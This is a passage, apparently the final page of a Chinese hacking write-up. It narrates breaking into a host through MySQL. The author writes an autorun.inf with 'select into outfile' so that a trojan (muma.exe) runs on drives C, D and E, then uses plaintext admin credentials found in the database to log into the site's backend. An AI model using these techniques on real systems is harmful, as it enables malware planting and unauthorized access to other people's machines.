(\"OPEN= d:\\muma.exe /autorun\")
发送命令(成功)
select * from tmp into outfile \"d:\\\\autorun.inf\"
drop table tmp
把这两个文件C盘,D盘,E盘都放了.
4,绝处逢生
第2天一打开电脑,就在cmd里输入telnet ip,返回的却是:
正在连接到xxx.xxx.xxx.xxx...不能打开到主机的连接, 在端口 23: 连接失败
当时真的很郁闷,又想到了21的FTP,又一个思路冒出来,下载一个serv-u,设置好密码后在把serv-udaemon.ini写进对方主机,最后登陆,不过仔细想想还是不行,因为MYSQL导出的文件不能覆盖其他文件……
不行,我还是不能放弃,我把注意力转移到MYSQL的数据上,仔细搜索,发现一个“wangzhan\"的列,进入后发现USER的表,看到里面有几个帐号,密码是名文保存的,接着我联想到网站上的管理系统,于是马上依照了第一个行的帐号登入,结果证明了我的猜测,我成功的进入了,只有发布新闻,下载等栏目,
并
数据载入中...
页码:[1] [2] [3] [4] [5] [6] [7] 第7页、共7页 |
